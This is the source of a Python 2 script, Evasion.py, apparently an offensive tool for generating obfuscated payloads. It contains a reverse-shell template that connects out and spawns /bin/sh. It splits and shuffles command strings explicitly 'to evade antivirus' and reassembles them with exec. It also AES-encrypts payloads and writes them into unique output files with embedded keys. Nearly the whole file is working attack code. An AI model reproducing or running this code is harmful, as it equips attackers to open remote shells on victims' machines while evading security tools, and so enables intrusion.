-
Notifications
You must be signed in to change notification settings - Fork 16
/
Evasion.py
217 lines (197 loc) · 7.49 KB
/
Evasion.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Author: Chang Tan Lister
# Product of Lister Unlimited Cybersecurity Solutions, LLC
# 702-886-8952
import re,random,string,Crypto,binascii,base64,sys,os,time,subprocess,toolkits,collections
from Crypto.Cipher import AES
from binascii import hexlify
from base64 import b64decode, b64encode
from toolkits import red, green, yellow, cyan
from collections import defaultdict
arrayList = []
template_reverse_shell = """
import socket,subprocess,os,pty
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("{}",{}))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
""".format(
str('127.0.0.1'),
int(1234)
)
def readPayloadTemplate(template='payload_template.py'):
# This is for the AES-128 encryption stage. Not necessary now
return readLines
def findIndexValue(query,shuffledLine):# Searches for the new index value of the shuffled payload
index = shuffledLine.index(query)
return index
# def generateDictString(shuffledPayload):
# for k in shuffledPayload:
# v0 = shuffledPayload[k][0]
# v1 = shuffledPayload[k][1]
# dictString = "shuffledPayload"
# return dictString
def commandSegmentationTech(readLines):
shuffledPayload = {}
ctr = 0
for l in readLines:
arrayMap = []
brokenLine = l
brokenLine = re.findall('..?',brokenLine)
print "DEBUG: Malicious command broken apart before shuffling\r\n{}".format(brokenLine)
# Generates a shuffled version of the line
shuffledLine = random.sample(brokenLine,len(brokenLine))
print "DEBUG: Shuffled line to evade antivirus\r\n{}".format(shuffledLine)
# build a array map to reconstitute that line
for lElement in brokenLine:
query = lElement
index = findIndexValue(query,shuffledLine)
# ArrayMap = a map of indices to reconstruct the payload
arrayMap.append(index)
# Add dictionary entry where shuffledPayload = {[shuffledLine]:[arrayMap]}
# arrayMap = shuffledPayload[shuffledLine]
# shuffledPayload = arrayMap
shuffledPayload[ctr] = shuffledLine,arrayMap
print "DEBUG: Array-Map to reconstitute the payload\r\n{}".format(str(arrayMap))
ctr += 1
print green("DEBUG: ShuffledPayload with ArrayMaps for reconstitution:\r\n{}".format(shuffledPayload))
return shuffledPayload
# This code is in the decoder stub, never in the generator except for debugging purposes.
def reconstituteLine(shuffledLine,arrayMap):
cmd=""
print red("DEBUG: Shuffled Line to Reconstitute\r\n{}".format(shuffledLine))
print yellow("DEBUG: arrayMap to reconstitute the payload\r\n{}".format(arrayMap))
for indice in arrayMap:
cmd = "{}{}".format(str(cmd),str(shuffledLine[indice]))
print green("DEBUG: Reconstituted Command:\r\n{}".format(str(cmd)))
return cmd
def reconstitutePayload(shuffledPayload):#Reconstitutes and sets off each payload line by line
for key in shuffledPayload:
cmd = ""
shuffledLine = shuffledPayload[key][0] # key being the dictionary object of the scrambled payload line
arrayMap = shuffledPayload[key][1] # value being the arrayMap
cmd = reconstituteLine(shuffledLine,arrayMap)
exec(cmd)
print "DEBUG: Executed python command\r\n{}".format(str(cmd))
return
def fillList(arrayBrokenShellCode,toFill):
for i in range(0,toFill):
arrayBrokenShellCode.append("aa")
return arrayBrokenShellCode
def generateArrayList(l):
arrayBrokenShellCode = re.findall('..?',l)
arrayBSOrig = list(arrayBrokenShellCode)
toFill = 50 - len(arrayBrokenShellCode)
arrayBrokenShellCode = fillList(arrayBrokenShellCode,toFill)
arrayShuffled = random.sample(arrayBrokenShellCode,len(arrayBrokenShellCode))
for i in arrayShuffled:
if i == 'aa' or None:
char = ''.join(random.choice(string.ascii_lowercase) for i in range(2))
arrayShuffled[arrayShuffled.index(i)] = char
return arrayShuffled,arrayBSOrig
scmap = []
def remap(arrayBSOrig,arrayShuffled):
for word in arrayBSOrig:
mapped = arrayShuffled.index(word)
scmap.append(mapped)
return scmap
def reconstituteSC(arrayShuffled,scmap):
cmd=""
for index in scmap:
cmd += arrayShuffled[index]
cmd = cmd.strip().rstrip()
# print "Executing Command:\r\n{}".format(str(cmd))
exec(cmd)
return cmd
def reconstituteOrig(arrayBSOrig):
shell=[]
for x in arrayBSOrig:
cmd = ""
try:
cmd = "".join(x)
shell.append(cmd)
except:
pass
# print shell
for c in shell:
cmd = c
# print "Executing Command:\r\n{}".format(str(cmd))
exec(cmd)
return
def generateKey(size=32,chars=string.ascii_uppercase + string.digits):
return ''.join(random.choice(chars) for x in range(size))
def generateIV(size=16,chars=string.ascii_lowercase + string.digits):
return ''.join(random.choice(chars) for x in range(size))
def cryptor(shellcommands, key, IV):
obj = AES.new(key,AES.MODE_CFB,IV)
ciphertext = obj.encrypt(shellcommands)
return ciphertext
def safeDecryptShellCommands(ciphertext, key, IV):
obj3 = AES.new(key,AES.MODE_CFB,IV)
plainTextCmd = obj3.decrypt(ciphertext)
return plainTextCmd
def writePayloadToFile(l_encrypted):
out = l_encrypted
payload = 'payload.txt'
w = open(payload,'w+')
w.write(out)
w.close()
return payload
def executeEncryptedPayload(payload,decryptKey,decryptIV):
r = open(payload,'r+')
cryptedPayload = r.read()
r.close()
x = safeDecryptShellCommands(cryptedPayload,decryptKey,decryptIV)
lines = x.splitlines()
return lines
timestr = time.strftime("%Y%m%d-%H%M%S")
payload2="darklordobama_{}.py".format(str(timestr))
template_reverse_shell = template_reverse_shell.strip().rstrip()
def writeUniquePayload(code,l_encrypted,decryptKey,decryptIV,outfile=payload2):
cmd = "touch {}".format(str(outfile))
subprocess.call(cmd,shell=True,executable='/bin/bash')
out = b64encode(l_encrypted)
w = open(outfile,'wb+')
c = code.splitlines()
for line in c:
# Add unique key
if 'key=' in line:
kline = 'key="""{}"""'.format(str(decryptKey))
line = line.replace('key=',kline)
# Add unique Initialization Vector
if 'iv=' in line:
ivline = 'iv="""{}"""'.format(str(decryptIV))
line = line.replace('iv=',ivline)
# Add unique Encrypted Payload
if 'pld=' in line:
pldline1 = 'pld=str("""'
pldline2 = "{}".format(str(out))
pldline3 = '""")'
pldline = """
{}
{}
{}
""".format(
str(pldline1),
str(pldline2),
str(pldline3)
)
line = line.replace('pld=',pldline)
# Write all lines whether or not they need to be rewritten
w.write('\r\n'+line)
# Save the file as outfile.py
w.close()
cmd = "ls $PWD/{}".format(str(outfile))
of = subprocess.Popen(cmd,shell=True,executable='/bin/bash',stdout=subprocess.PIPE,stderr=subprocess.PIPE)
ofile = str(of.stdout.read().encode('utf-8')).strip().rstrip()
# cmd = "pyobfuscate {0} 2>&1 | tee {0}_payload.py;rm {0}".format(str(ofile))
print "Payload saved at:\r\n{}".format(str(ofile))
return outfile
def read_template(template="./payload_template.py"):
r = open(template,'rb+')
code = r.read()
r.close()
return code